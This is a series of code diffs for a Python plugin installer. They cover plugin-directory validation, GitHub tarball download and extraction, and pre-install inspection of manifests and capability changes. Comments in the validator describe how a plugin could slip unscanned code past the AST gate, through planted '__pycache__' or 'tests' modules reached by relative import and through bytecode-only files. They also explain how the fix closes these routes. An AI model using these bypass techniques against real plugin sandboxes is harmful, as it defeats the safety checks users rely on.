+# CPython writes and irrelevant here: the attacker supplies the tarball, so
+# `__pycache__/payload.py` exists because they put it there, and
+# `"__pycache__".isidentifier()` is `True` -- PEP-420 namespace resolution
+# imports it exactly like any other directory name. Verified directly, not
+# merely argued: with a plugin installed through the real loader, both
+# `importlib.import_module("cdui_plugins.<id>.__pycache__.payload")` and a
+# relative `from ..__pycache__ import payload` inside `nodes/` resolve to the
+# planted file, and `validate_plugin_dir` (before this fix) accepted it
+# silently. Reasoning about what a directory name conventionally holds is not
+# the same claim as reasoning about what Python's import system can reach,
+# and only the second one is what this set is for.
+#
+# ``.git`` is the one name that passes that test for real: `.git` is not a
+# valid identifier (`".git".isidentifier()` is `False`, and `.` cannot appear
+# inside one), so no `import` statement -- absolute or relative -- can ever
+# name a package component spelled that way. That is a structural guarantee
+# independent of what is inside the directory, which is the property this
+# set exists to require before trusting a name to be un-scanned.
+#
+# Narrowing the LOADER's ``__path__`` instead, so a skipped directory were
+# unreachable rather than merely unscanned, was considered and rejected:
+# PEP-420 namespace packages have no native "every subdirectory except these"
+# carve-out, so that route needs a custom import finder/loader -- new import
+# machinery, not an extension of either existing one -- for a difference this
+# scan already erases by scanning first.
+_VALIDATION_SKIP_DIRS = frozenset({".git"})
+
+
+def validate_plugin_dir(
+    plugin_root: Path,
+    allowed_modules: list[str],
+    capabilities: Iterable[str] = (),
+) -> None:
+    """Walk the entire plugin directory and validate every importable file.
+
+    The original ``validate_nodes_dir`` only checked ``nodes/`` which left a
+    bypass via top-level helpers. This visits every file in the tree that
+    Python's import system could load, except the ones under
+    :data:`_VALIDATION_SKIP_DIRS` -- ``.git`` alone, the one name provably
+    unreachable through Python's import system (not a valid identifier, so
+    no ``import`` can ever name it). Nothing else is skipped: ``examples/``,
+    ``tests/``, ``docs/``, ``assets/`` and ``__pycache__`` all get scanned
+    too (core#182), because the plugin loader registers the WHOLE directory
+    as a namespace package's ``__path__``, so a scanned ``nodes/foo.py`` can
+    ``from ..tests import payload`` -- or ``from ..__pycache__ import
+    payload`` -- into any of them.
+
+    "Every file the import system could load" is by EXTENSION as well as by
+    directory since core#220: this used to glob ``*.py`` while the loader
+    also accepts ``.pyw``, ``.pyc`` and ``.pyd`` / ``.so``, so a plugin
+    shipping ``nodes/helper.pyc`` and no ``helper.py`` was never scanned at
+    all -- the gate did not fail open, it never ran. Source suffixes are
+    scanned; compiled ones are refused by name (see
+    :func:`_validate_importable_tree`), because a plugin has no legitimate
+    reason to ship a bytecode-only or binary module through this path and
+    neither can be AST-scanned.
+
+    *capabilities* are the ones the user confirmed at install time. They are
+    passed to every file rather than per-file, because a capability is a
+    property of the INSTALL, not of a source file: a plugin granted
+    ``network`` may reach it from wherever it likes inside its own tree.
+
+    *allowed_modules* also lifts the ``denied_attributes`` closed by
+    core#179 -- see :func:`_denied_attributes_for` -- because a non-empty
+    list here only happens once ``--trust-author`` has already been
+    accepted, and refusing ``arr.dump()`` to a plugin trusted with
+    ``subprocess`` protects nothing.
+    """
+    _validate_importable_tree(
+        plugin_root,
+        allowed_modules,
+        capabilities,
+        skip_dirs=_VALIDATION_SKIP_DIRS,
+    )

--- a/backend/app/core/plugins/github.py
+++ b/backend/app/core/plugins/github.py
@@ -29,6 +29,7 @@ that does nothing for a minute and a progress bar with two frames.
 
 from __future__ import annotations
 
+import http.client
 import json
 import os
 import tarfile
@@ -125,6 +126,14 @@ def _gh_get(url: str, timeout: float = 30.0) -> bytes:
 
     Every request in this module goes through here, so the token, the user
     agent and the two shapes of failure are decided once.
+
+    ``http.client.HTTPException`` is caught alongside the OSError family
+    because it is NOT one: ``InvalidURL`` -- what a ref with a space or a
+    control character in it becomes by the time ``putrequest`` sees the URL
+    -- would otherwise travel out of here as itself, past every caller that
+    catches ``GitHubError`` and past the CLI's ``except RuntimeError``, and
+    turn a bad ref into a traceback. It never reached GitHub, so it has no
+    status, which is exactly what ``None`` says.
     """
     req = urllib.request.Request(url, headers=_headers())
     try:
@@ -132,7 +141,7 @@ def _gh_get(url: str, timeout: float = 30.0) -> bytes:
             return resp.read()
     except HTTPError as exc:
         raise _from_http_error(exc) from exc
-    except (URLError, TimeoutError) as exc:
+    except (URLError, TimeoutError, http.client.HTTPException) as exc:
         raise _from_url_error(exc) from exc
 
 
@@ -144,11 +153,18 @@ def resolve_sha(owner: str, repo: str, ref: str) -> str:
     loud: it is the repo, the ref, or the spelling of either, and only the
     caller's sentence can say which three things to check. The ``status``
     rides along unchanged.
+
+    A 200 that is not JSON is a failure too, and its own one: a captive
+    portal, a school proxy's block page or a transparent MITM all answer
+    "200 OK" with HTML. That is a ``json.JSONDecodeError`` -- a ``ValueError``
+    that no caller of this function catches -- so it becomes a
+    :class:`~.errors.GitHubError` with no status, because whatever answered
+    was not GitHub.
     """
     target = ref or "HEAD"
     url = f"https://api.github.com/repos/{owner}/{repo}/commits/{target}"
     try:
-        data = json.loads(_gh_get(url))
+        body = _gh_get(url)
     except GitHubError as exc:
         if exc.status is None:
             raise GitHubError(
@@ -157,6 +173,14 @@ def resolve_sha(owner: str, repo: str, ref: str) -> str:
         raise GitHubError(
             f"GitHub API returned {exc.status} for {owner}/{repo}@{target}: {exc}",
             status=exc.status,
+        ) from exc
+    try:
+        data = json.loads(body)
+    except ValueError as exc:
+        raise GitHubError(
+            f"GitHub API request for {owner}/{repo}@{target} did not return "
+            f"JSON; something on the way answered instead of GitHub",
+            status=None,
         ) from exc
     sha = data.get("sha") if isinstance(data, dict) else None
     if not sha:

--- a/backend/app/core/plugins/github.py
+++ b/backend/app/core/plugins/github.py
@@ -1,0 +1,284 @@
+"""The only place this project talks to GitHub about a plugin.
+
+Three requests, and each one has a different failure worth telling apart:
+resolve a ref to a commit, read that commit's manifest, download that
+commit's tarball. They were three ad-hoc ``urlopen`` calls in the CLI, each
+translating ``HTTPError`` into its own sentence, and the sentences did not
+say the same thing about the same failure. A GUI cannot work from sentences
+at all, so the answer here is :class:`~.errors.GitHubError` with a
+``status``: 404 is a typo in the repo name, 403 is usually the rate limit,
+and ``None`` means the request never reached GitHub -- three different next
+steps for the user, and none of them recoverable from message text.
+
+The message is GitHub's own when GitHub sent one. Its JSON bodies say
+"Not Found", "API rate limit exceeded for ...", "Bad credentials"; the HTTP
+reason phrase says "Forbidden" for all three. Quoting the body is what makes
+a rate-limited install say so.
+
+``CODEFYUI_GITHUB_TOKEN`` is read from the environment at CALL time, not at
+import: a server process that gains a token must not have to restart to use
+it. It is attached as a bearer header and never logged, echoed, or put in an
+exception -- this module logs nothing at all, which is the cheapest way to
+be sure.
+
+The download is streamed rather than read whole, and takes a *cancel_check*
+and a *progress* callback, because the caller may be a job the user can stop
+from a browser: a 100 MB read inside one ``resp.read()`` is a Stop button
+that does nothing for a minute and a progress bar with two frames.
+"""
+
+from __future__ import annotations
+
+import json
+import os
+import tarfile
+import time
+import urllib.request
+from collections.abc import Callable
+from pathlib import Path
+from urllib.error import HTTPError, URLError
+
+from app.core.plugin_loader import MANIFEST_FILENAME
+
+from .errors import GitHubError, PluginCancelled, PluginInstallError
+
+USER_AGENT = "cdui-plugin-installer/0.1"
+MAX_TARBALL_BYTES = 100 * 1024 * 1024  # 100 MB
+
+#: Read size for the tarball stream. Small enough that a cancel is felt
+#: immediately on a slow link, large enough that a 100 MB download is not
+#: 1600 syscalls.
+CHUNK_BYTES = 64 * 1024
+
+#: Minimum seconds between two ``progress`` calls. Four frames a second is
+#: smooth to a human and is orders of magnitude fewer events than one per
+#: 64 KB chunk would send down a WebSocket. The first and last frames are
+#: forced past it -- a download that finishes inside a throttle window would
+#: otherwise leave the bar stopped at 97%.
+PROGRESS_MIN_INTERVAL_S = 0.25
+
+
+def _headers() -> dict[str, str]:
+    """Request headers, with the token when the environment has one.
+
+    Unauthenticated GitHub allows 60 requests an hour per IP, which a
+    classroom behind one NAT exhausts in a morning -- ``CODEFYUI_GITHUB_TOKEN``
+    is how a school raises that. Read here, per request, so a token exported
+    after the server started still works; returned rather than cached so no
+    copy of it outlives the call.
+    """
+    headers = {"User-Agent": USER_AGENT}
+    token = os.environ.get("CODEFYUI_GITHUB_TOKEN")
+    if token:
+        headers["Authorization"] = f"Bearer {token}"
+    return headers
+
+
+def _from_http_error(exc: HTTPError) -> GitHubError:
+    """An :class:`~.errors.GitHubError` carrying GitHub's own words.
+
+    The body is JSON with a ``message`` on every GitHub API error, and that
+    message is the one that distinguishes the three things a 403 can mean.
+    Anything unreadable falls back to the HTTP reason phrase, which is at
+    least always there.
+    """
+    message = ""
+    try:
+        body = exc.read()
+    except Exception:  # a body that cannot be read is not the failure to report
+        body = b""
+    if body:
+        try:
+            payload = json.loads(body.decode("utf-8", "replace"))
+        except ValueError:
+            payload = None
+        if isinstance(payload, dict) and isinstance(payload.get("message"), str):
+            message = payload["message"]
+    return GitHubError(message or str(exc.reason), status=exc.code)
+
+
+def _gh_get(url: str, timeout: float = 30.0) -> bytes:
+    """GET *url* from GitHub, or raise :class:`~.errors.GitHubError`.
+
+    Every request in this module goes through here, so the token, the user
+    agent and the two shapes of failure are decided once.
+    """
+    req = urllib.request.Request(url, headers=_headers())
+    try:
+        with urllib.request.urlopen(req, timeout=timeout) as resp:
+            return resp.read()
+    except HTTPError as exc:
+        raise _from_http_error(exc) from exc
+    except (URLError, TimeoutError) as exc:
+        reason = getattr(exc, "reason", exc)
+        raise GitHubError(str(reason), status=None) from exc
+
+
+def resolve_sha(owner: str, repo: str, ref: str) -> str:
+    """Convert tag / branch / short-sha to a full 40-char SHA.
+
+    The failure is re-raised naming the repository and the ref, because
+    GitHub's own "Not Found" answers a question the user never asked out
+    loud: it is the repo, the ref, or the spelling of either, and only the
+    caller's sentence can say which three things to check. The ``status``
+    rides along unchanged.
+    """
+    target = ref or "HEAD"
+    url = f"https://api.github.com/repos/{owner}/{repo}/commits/{target}"
+    try:
+        data = json.loads(_gh_get(url))
+    except GitHubError as exc:
+        if exc.status is None:
+            raise GitHubError(
+                f"GitHub API request failed: {exc}", status=None
+            ) from exc
+        raise GitHubError(
+            f"GitHub API returned {exc.status} for {owner}/{repo}@{target}: {exc}",
+            status=exc.status,
+        ) from exc
+    sha = data.get("sha") if isinstance(data, dict) else None
+    if not sha:
+        raise GitHubError(
+            f"GitHub API response for {owner}/{repo}@{target} is missing 'sha'"
+        )
+    return sha
+
+
+def fetch_manifest_text(owner: str, repo: str, sha: str) -> str:
+    """The ``cdui.plugin.toml`` of one commit, as text.
+
+    Read from ``raw.githubusercontent.com`` at a full SHA rather than out of
+    the tarball, so that inspecting a plugin -- which is what a person does
+    BEFORE agreeing to install it -- costs one small file instead of the
+    whole repository. Pinning the SHA is what makes the manifest that was
+    shown the manifest that gets installed.
+
+    Raises :class:`~.errors.GitHubError` like everything else here, and
+    ``UnicodeDecodeError`` for a file that is not UTF-8 -- a manifest that
+    is not text is a disk answer, not a network one, and its caller can say
+    something better than "request failed".
+    """
+    url = f"https://raw.githubusercontent.com/{owner}/{repo}/{sha}/{MANIFEST_FILENAME}"
+    return _gh_get(url).decode("utf-8")
+
+
+def _content_length(resp: object) -> int | None:
+    """The response's ``Content-Length``, or ``None`` when it has none.
+
+    ``None`` rather than 0: a progress bar told the total is zero renders as
+    finished, while one told nothing renders as counting up, which is the
+    truth about a chunked response.
+    """
+    headers = getattr(resp, "headers", None)
+    raw = headers.get("Content-Length") if headers is not None else None
+    try:
+        total = int(raw)
+    except (TypeError, ValueError):
+        return None
+    return total or None
+
+
+def download_tarball(
+    owner: str,
+    repo: str,
+    sha: str,
+    dest: Path,
+    *,
+    cancel_check: Callable[[], bool] | None = None,
+    progress: Callable[[int, int | None], None] | None = None,
+) -> None:
+    """Stream one commit's tarball to *dest*.
+
+    Streamed, and cancelled BETWEEN CHUNKS, because the caller may be a job
+    a browser can stop: a check that only ran between whole downloads would
+    not be reached until the download the user is trying to stop had
+    finished.
+
+    *progress* is called ``(bytes_done, bytes_total_or_None)`` at most every
+    :data:`PROGRESS_MIN_INTERVAL_S`, always once before the first byte and
+    always once after the last.
+
+    Nothing partial is left behind. A cancelled or over-cap download removes
+    *dest*, so no caller can mistake half a tarball for a file it may open.
+    """
+    url = f"https://codeload.github.com/{owner}/{repo}/tar.gz/{sha}"
+    req = urllib.request.Request(url, headers=_headers())
+    bytes_read = 0
+    total: int | None = None
+    last_report = 0.0
+    reported = False
+
+    def _report(*, force: bool) -> None:
+        nonlocal last_report, reported
+        if progress is None:
+            return
+        now = time.monotonic()
+        if not force and reported and now - last_report < PROGRESS_MIN_INTERVAL_S:
+            return
+        last_report = now
+        reported = True
+        progress(bytes_read, total)
+
+    try:
+        with urllib.request.urlopen(req, timeout=60.0) as resp, dest.open("wb") as fout:
+            total = _content_length(resp)
+            _report(force=True)
+            while True:
+                chunk = resp.read(CHUNK_BYTES)
+                if not chunk:
+                    break
+                bytes_read += len(chunk)
+                if bytes_read > MAX_TARBALL_BYTES:
+                    cap_mb = MAX_TARBALL_BYTES // (1024 * 1024)
+                    raise PluginInstallError(
+                        f"Tarball exceeds {cap_mb} MB limit.",
+                        hint=(
+                            f"{owner}/{repo}@{sha[:7]} is larger than the "
+                            f"{cap_mb} MB this build will download; nothing "
+                            f"was kept."
+                        ),
+                    )
+                fout.write(chunk)
+                if cancel_check is not None and cancel_check():
+                    raise PluginCancelled(
+                        f"download of {owner}/{repo}@{sha[:7]} cancelled"
+                    )
+                _report(force=False)
+            _report(force=True)
+    except HTTPError as exc:
+        dest.unlink(missing_ok=True)
+        raise _from_http_error(exc) from exc
+    except (URLError, TimeoutError) as exc:
+        dest.unlink(missing_ok=True)
+        reason = getattr(exc, "reason", exc)
+        raise GitHubError(str(reason), status=None) from exc
+    except BaseException:
+        dest.unlink(missing_ok=True)
+        raise
+
+
+def extract_tarball(tar_path: Path, dest_dir: Path) -> Path:
+    """Unpack *tar_path* into *dest_dir* and return its single root directory.
+
+    ``filter="data"`` is the load-bearing argument: without it a tarball can
+    write outside *dest_dir* through ``../`` members, absolute paths, links
+    and device nodes -- and this one comes off the internet.
+
+    Exactly one top-level directory, or nothing is installed. A GitHub
+    codeload tarball is always ``<repo>-<ref>/...`` and that root is what the
+    manifest is read from; a tarball with two of them is not a plugin whose
+    root can be guessed, and guessing would mean installing whichever one the
+    filesystem happened to list first.
+    """
+    with tarfile.open(tar_path, "r:gz") as tf:
+        tf.extractall(dest_dir, filter="data")
+    roots = [p for p in sorted(dest_dir.iterdir()) if p.is_dir()]
+    if len(roots) != 1:
+        raise PluginInstallError(
+            "A plugin tarball must hold exactly one top-level directory.",
+            hint=(
+                f"{tar_path.name} unpacked to {len(roots)}: "
+                f"{', '.join(p.name for p in roots) or '(none)'}"
+            ),
+        )
+    return roots[0]

--- a/backend/app/core/plugins/github.py
+++ b/backend/app/core/plugins/github.py
@@ -97,6 +97,29 @@ def _from_http_error(exc: HTTPError) -> GitHubError:
     return GitHubError(message or str(exc.reason), status=exc.code)
 
 
+def _from_url_error(exc: BaseException) -> GitHubError:
+    """A :class:`~.errors.GitHubError` for a request that never got a status.
+
+    DNS, TLS, a refused connection, a timeout: no HTTP status exists, and
+    ``None`` is what tells the caller to talk about the network rather than
+    about the repository name.
+    """
+    return GitHubError(str(getattr(exc, "reason", exc)), status=None)
+
+
+def _discard(path: Path) -> None:
+    """Delete a partial download, never raising over it.
+
+    Cleanup runs while another exception is in flight, and a file the
+    filesystem will not let go of must not replace the failure that is
+    actually worth reporting.
+    """
+    try:
+        path.unlink(missing_ok=True)
+    except OSError:
+        pass
+
+
 def _gh_get(url: str, timeout: float = 30.0) -> bytes:
     """GET *url* from GitHub, or raise :class:`~.errors.GitHubError`.
 
@@ -110,8 +133,7 @@ def _gh_get(url: str, timeout: float = 30.0) -> bytes:
     except HTTPError as exc:
         raise _from_http_error(exc) from exc
     except (URLError, TimeoutError) as exc:
-        reason = getattr(exc, "reason", exc)
-        raise GitHubError(str(reason), status=None) from exc
+        raise _from_url_error(exc) from exc
 
 
 def resolve_sha(owner: str, repo: str, ref: str) -> str:
@@ -246,14 +268,15 @@ def download_tarball(
                 _report(force=False)
             _report(force=True)
     except HTTPError as exc:
-        dest.unlink(missing_ok=True)
+        _discard(dest)
         raise _from_http_error(exc) from exc
     except (URLError, TimeoutError) as exc:
-        dest.unlink(missing_ok=True)
-        reason = getattr(exc, "reason", exc)
-        raise GitHubError(str(reason), status=None) from exc
+        _discard(dest)
+        raise _from_url_error(exc) from exc
     except BaseException:
-        dest.unlink(missing_ok=True)
+        # Everything else -- the cap, a cancel, a disk error, Ctrl-C -- leaves
+        # the same rule behind it: no half a tarball where a caller looks.
+        _discard(dest)
         raise
 
 

--- a/backend/app/core/plugins/inspect.py
+++ b/backend/app/core/plugins/inspect.py
@@ -43,7 +43,7 @@ from typing import Any, Literal
 from app.core import plugin_loader
 
 from . import catalog as catalog_module
-from . import github, sources
+from . import github, listing, sources
 from .errors import PluginInstallError
 from .manifest import (
     manifest_allowed_modules,
@@ -367,6 +367,15 @@ def inspect_installed(plugin_id: str, *, lockfile: dict[str, Any]) -> Inspection
     Only ``github_url`` plugins have an update to look for: a built-in pack
     updates with CodefyUI itself, and a linked development directory is
     whatever is on the developer's disk right now.
+
+    Provenance is carried forward rather than dropped. Re-inspecting is the
+    same plugin seen a second time, so an update dialog must be able to say
+    "this is the catalog's own pack" exactly where the install did: the
+    recorded ``catalog_id`` is passed straight through, and ``official`` is
+    :func:`~.listing.is_official` -- the same rule the Plugin Center's badge
+    uses, so a row cannot be official in the panel and unofficial in the
+    dialog that updates it. Without this, every update of an official plugin
+    read as third-party free text.
     """
     entry = _lockfile_entry(lockfile, plugin_id)
     if entry is None:
@@ -384,9 +393,12 @@ def inspect_installed(plugin_id: str, *, lockfile: dict[str, Any]) -> Inspection
             f"Cannot tell which repository {plugin_id!r} came from.",
             hint=f"url={entry.get('url')!r} source={entry.get('source')!r}",
         )
+    recorded_catalog_id = _text(entry.get("catalog_id")) or None
     return inspect_github(
         match.group(1),
         match.group(2),
         _text(entry.get("ref")),
         lockfile=lockfile,
+        catalog_id=recorded_catalog_id,
+        official=listing.is_official(catalog_module.catalog_entry(plugin_id), entry),
     )

--- a/backend/app/core/plugins/inspect.py
+++ b/backend/app/core/plugins/inspect.py
@@ -279,11 +279,13 @@ def inspect_github(
     restore, where re-resolving a tag that has since moved would defeat the
     pin.
 
-    Refuses an id this build reserves: the ids under ``/api/plugins/`` that
-    are routes rather than packs, and the ids the built-in catalog already
-    owns. It does NOT refuse every catalog id -- a catalog ``github`` entry
-    IS a repository, and refusing its own id would make an official
-    third-party pack uninstallable.
+    Refuses an id this build reserves, and the decision is
+    :func:`~.catalog.reserved_id_holder`'s rather than this function's: a
+    route name, a pack that ships here, or a ``github`` catalog row belonging
+    to a DIFFERENT repository. That last clause is why the repository is
+    passed in at all -- a catalog ``github`` id is not reserved outright,
+    because refusing it would make the official pack the one thing nobody can
+    install, but a fork may not take its place.
 
     Raises :class:`~.errors.GitHubError`, ``tomllib.TOMLDecodeError``,
     :class:`~.errors.ManifestError` or :class:`~.errors.PluginInstallError`.
@@ -293,13 +295,8 @@ def inspect_github(
     validate_manifest(manifest)
     plugin_id = manifest["plugin"]["id"]
 
-    if plugin_id in catalog_module.RESERVED_PLUGIN_IDS:
-        taken_by = "a route under /api/plugins/"
-    elif plugin_id in catalog_module.builtin_catalog_packs():
-        taken_by = "a pack that ships with CodefyUI"
-    else:
-        taken_by = ""
-    if taken_by:
+    taken_by = catalog_module.reserved_id_holder(plugin_id, owner=owner, repo=repo)
+    if taken_by is not None:
         raise PluginInstallError(
             f"Plugin id {plugin_id!r} is reserved by this build.",
             hint=(

--- a/backend/app/core/plugins/inspect.py
+++ b/backend/app/core/plugins/inspect.py
@@ -1,0 +1,395 @@
+"""Everything true about a plugin you have not installed yet, in one answer.
+
+"Do you want to install this?" is a question nobody can answer from a name.
+What it takes is the manifest -- what the plugin is, what it asks for, what
+it would run in your browser -- plus what THIS install already knows about
+it, which is the half that turns "install" into "update" and a re-grant into
+a new decision. Both halves used to be assembled twice: once by
+``cdui plugin info``, printing as it went, and once, differently, by the
+install path.
+
+So the assembling happens here and produces a value. :class:`Inspection` is
+flat and fully populated -- absent things are ``()``, ``{}`` or ``""``, and
+``None`` only where it means "this kind of source does not have one" -- so a
+template can render it without asking what shape a field is this time, and a
+route can serialise it without a second pass.
+
+Two rules the shape encodes:
+
+* ``installed`` is the LOCKFILE's record, never the manifest's. A plugin
+  that rewrote its manifest after install would otherwise be shown as if
+  what it now asks for is what the user agreed to.
+* ``capabilities_added`` and ``allowed_modules_added`` are the whole reason
+  an update is worth inspecting: capability creep between the version
+  somebody consented to and the one about to replace it is the supply-chain
+  shape a plugin manager can actually catch.
+
+The lockfile arrives as an argument rather than being read here, because the
+caller already has one -- and because a test that wants to describe an
+update should be able to say so in a dict instead of writing a file.
+
+Nothing here prints, prompts or installs. :data:`FRONTEND_WARNING` and
+:data:`ALLOWED_MODULES_WARNING` are English, one sentence each, and a caller
+that speaks another language is expected to key off ``has_frontend`` and
+``allowed_modules`` instead of translating them.
+"""
+
+from __future__ import annotations
+
+import sys
+from dataclasses import dataclass
+from typing import Any, Literal
+
+from app.core import plugin_loader
+
+from . import catalog as catalog_module
+from . import github, sources
+from .errors import PluginInstallError
+from .manifest import (
+    manifest_allowed_modules,
+    manifest_capabilities,
+    manifest_has_frontend,
+    manifest_python_deps,
+    read_manifest,
+    validate_manifest,
+)
+from .sources import _GITHUB_SHORT, _GITHUB_URL
+
+if sys.version_info >= (3, 11):
+    import tomllib
+else:
+    import tomli as tomllib  # 3.10 backport -- same API.
+
+#: Said whenever a plugin ships browser code. Its own warning because the AST
+#: gate has nothing to say about JavaScript: frontend code runs inside the
+#: editor, in the user's session, with everything the editor can reach.
+FRONTEND_WARNING = (
+    "This plugin ships JavaScript that runs in the editor with full access."
+)
+
+#: Said whenever a plugin declares ``allowed_modules``. Those imports are the
+#: gate being switched off by name, which is a decision about the AUTHOR
+#: rather than about the code.
+ALLOWED_MODULES_WARNING = (
+    "This plugin asks to import: {modules}. "
+    "Installing requires trusting the author."
+)
+
+
+@dataclass(frozen=True)
+class Inspection:
+    """One source, read and compared against what this install already has."""
+
+    kind: Literal["builtin", "github"]
+    mode: Literal["install", "update"]
+    plugin_id: str
+    catalog_id: str | None
+    official: bool
+    source: str
+    url: str | None
+    ref: str | None
+    sha: str | None
+    name: str
+    version: str
+    description: str
+    homepage: str
+    manifest: dict[str, Any]
+    capabilities: tuple[str, ...]
+    allowed_modules: tuple[str, ...]
+    python_deps: dict[str, str]
+    has_frontend: bool
+    chapters: tuple[str, ...]
+    lessons: tuple[str, ...]
+    consent_required: bool
+    installed: dict[str, Any] | None
+    up_to_date: bool
+    capabilities_added: tuple[str, ...]
+    allowed_modules_added: tuple[str, ...]
+    warnings: tuple[str, ...]
+
+
+def _text(value: Any) -> str:
+    """*value* when it is a string, else the empty string."""
+    return value if isinstance(value, str) else ""
+
+
+def _strings(value: Any) -> tuple[str, ...]:
+    """The string members of *value* when it is a list, else empty."""
+    if not isinstance(value, list):
+        return ()
+    return tuple(item for item in value if isinstance(item, str))
+
+
+def _lockfile_entry(lockfile: dict[str, Any], plugin_id: str) -> dict[str, Any] | None:
+    """This install's record for *plugin_id*, or ``None``."""
+    plugins = lockfile.get("plugins")
+    if not isinstance(plugins, dict):
+        return None
+    entry = plugins.get(plugin_id)
+    return entry if isinstance(entry, dict) else None
+
+
+def _installed_record(entry: dict[str, Any]) -> dict[str, Any]:
+    """The lockfile fields a reader has to see before deciding on an update.
+
+    ``version`` comes out of the recorded ``manifest`` table rather than off
+    the disk: it is the version the user consented to, which is the only one
+    worth comparing the incoming manifest against.
+    """
+    recorded = entry.get("manifest")
+    recorded = recorded if isinstance(recorded, dict) else {}
+    return {
+        "sha": entry.get("sha"),
+        "version": _text(recorded.get("version")),
+        "capabilities": _strings(entry.get("capabilities")),
+        "trusted_modules": _strings(entry.get("trusted_modules")),
+        "enabled": plugin_loader.is_enabled(entry),
+        "source_kind": _text(entry.get("source_kind")),
+    }
+
+
+def _inspection(
+    *,
+    kind: Literal["builtin", "github"],
+    plugin_id: str,
+    manifest: dict[str, Any],
+    lockfile: dict[str, Any],
+    source: str,
+    url: str | None = None,
+    ref: str | None = None,
+    sha: str | None = None,
+    catalog_id: str | None = None,
+    official: bool = False,
+    consent_required: bool,
+) -> Inspection:
+    """Assemble one :class:`Inspection` from a manifest and a lockfile.
+
+    The one place the two halves meet, so that "what is new since the
+    install" is computed identically for a catalog pack and a repository.
+    """
+    plugin_meta = manifest.get("plugin")
+    plugin_meta = plugin_meta if isinstance(plugin_meta, dict) else {}
+    lessons_meta = manifest.get("lessons")
+    lessons_meta = lessons_meta if isinstance(lessons_meta, dict) else {}
+
+    capabilities = manifest_capabilities(manifest)
+    allowed_modules = tuple(manifest_allowed_modules(manifest))
+    has_frontend = manifest_has_frontend(manifest)
+
+    entry = _lockfile_entry(lockfile, plugin_id)
+    installed = _installed_record(entry) if entry is not None else None
+    if installed is None:
+        capabilities_added: tuple[str, ...] = ()
+        allowed_modules_added: tuple[str, ...] = ()
+        up_to_date = False
+    else:
+        known_caps = set(installed["capabilities"])
+        known_modules = set(installed["trusted_modules"])
+        capabilities_added = tuple(c for c in capabilities if c not in known_caps)
+        allowed_modules_added = tuple(
+            m for m in allowed_modules if m not in known_modules
+        )
+        # A built-in pack has no sha on either side, and two ``None`` is the
+        # honest "the copy on disk is the copy you installed".
+        up_to_date = (installed["sha"] or None) == (sha or None)
+
+    warnings: list[str] = []
+    if has_frontend:
+        warnings.append(FRONTEND_WARNING)
+    if allowed_modules:
+        warnings.append(
+            ALLOWED_MODULES_WARNING.format(modules=", ".join(allowed_modules))
+        )
+
+    return Inspection(
+        kind=kind,
+        mode="update" if installed is not None else "install",
+        plugin_id=plugin_id,
+        catalog_id=catalog_id,
+        official=official,
+        source=source,
+        url=url,
+        ref=ref,
+        sha=sha,
+        name=_text(plugin_meta.get("name")) or plugin_id,
+        version=_text(plugin_meta.get("version")),
+        description=_text(plugin_meta.get("description")),
+        homepage=_text(plugin_meta.get("homepage")),
+        manifest=manifest,
+        capabilities=capabilities,
+        allowed_modules=allowed_modules,
+        python_deps=manifest_python_deps(manifest),
+        has_frontend=has_frontend,
+        chapters=_strings(lessons_meta.get("chapters")),
+        lessons=_strings(lessons_meta.get("lessons")),
+        consent_required=consent_required,
+        installed=installed,
+        up_to_date=up_to_date,
+        capabilities_added=capabilities_added,
+        allowed_modules_added=allowed_modules_added,
+        warnings=tuple(warnings),
+    )
+
+
+def inspect_builtin(plugin_id: str, *, lockfile: dict[str, Any]) -> Inspection:
+    """Describe a pack that ships in this release, read from disk.
+
+    ``consent_required`` is False and ``official`` is True, and both are
+    statements about provenance rather than about the code: a built-in pack
+    arrived with the release, through a pull request in this repository, so
+    there is no third party here for the user to be asked about. The
+    capabilities it declares are still reported -- ``cdui plugin list`` has
+    to answer "which of my plugins reaches the network" for every pack,
+    wherever it came from.
+
+    Raises ``FileNotFoundError`` when the directory has no manifest and
+    :class:`~.errors.ManifestError` when it has one this build will not
+    install.
+    """
+    manifest = read_manifest(plugin_loader.plugins_builtin_root() / plugin_id)
+    validate_manifest(manifest)
+    return _inspection(
+        kind="builtin",
+        plugin_id=plugin_id,
+        manifest=manifest,
+        lockfile=lockfile,
+        source=plugin_id,
+        catalog_id=plugin_id,
+        official=True,
+        consent_required=False,
+    )
+
+
+def inspect_github(
+    owner: str,
+    repo: str,
+    ref: str,
+    *,
+    lockfile: dict[str, Any],
+    pinned_sha: str | None = None,
+    catalog_id: str | None = None,
+    official: bool = False,
+) -> Inspection:
+    """Describe a repository at one commit, without downloading it.
+
+    The ref is resolved to a full SHA first and the manifest is read AT that
+    SHA, so what the user is shown and what an install would fetch are the
+    same commit -- a branch that moves between the two is exactly the
+    substitution this ordering removes. *pinned_sha* skips the resolve for a
+    restore, where re-resolving a tag that has since moved would defeat the
+    pin.
+
+    Refuses an id this build reserves: the ids under ``/api/plugins/`` that
+    are routes rather than packs, and the ids the built-in catalog already
+    owns. It does NOT refuse every catalog id -- a catalog ``github`` entry
+    IS a repository, and refusing its own id would make an official
+    third-party pack uninstallable.
+
+    Raises :class:`~.errors.GitHubError`, ``tomllib.TOMLDecodeError``,
+    :class:`~.errors.ManifestError` or :class:`~.errors.PluginInstallError`.
+    """
+    sha = pinned_sha or github.resolve_sha(owner, repo, ref)
+    manifest = tomllib.loads(github.fetch_manifest_text(owner, repo, sha))
+    validate_manifest(manifest)
+    plugin_id = manifest["plugin"]["id"]
+
+    if plugin_id in catalog_module.RESERVED_PLUGIN_IDS:
+        taken_by = "a route under /api/plugins/"
+    elif plugin_id in catalog_module.builtin_catalog_packs():
+        taken_by = "a pack that ships with CodefyUI"
+    else:
+        taken_by = ""
+    if taken_by:
+        raise PluginInstallError(
+            f"Plugin id {plugin_id!r} is reserved by this build.",
+            hint=(
+                f"{owner}/{repo} declares an id that names {taken_by}; it "
+                f"cannot be installed under that id."
+            ),
+        )
+
+    return _inspection(
+        kind="github",
+        plugin_id=plugin_id,
+        manifest=manifest,
+        lockfile=lockfile,
+        source=f"{owner}/{repo}" + (f"@{ref}" if ref else ""),
+        url=f"https://github.com/{owner}/{repo}",
+        ref=ref,
+        sha=sha,
+        catalog_id=catalog_id,
+        official=official,
+        consent_required=True,
+    )
+
+
+def inspect_source(spec: str, *, lockfile: dict[str, Any]) -> Inspection:
+    """Describe whatever the user typed: a catalog name, ``owner/repo``, a URL.
+
+    The dispatch is :func:`~.sources.parse_source`'s, so the Plugin Center
+    and ``cdui plugin install`` agree about what a string means. A catalog
+    entry carries its id and its ``official`` flag into the answer; free text
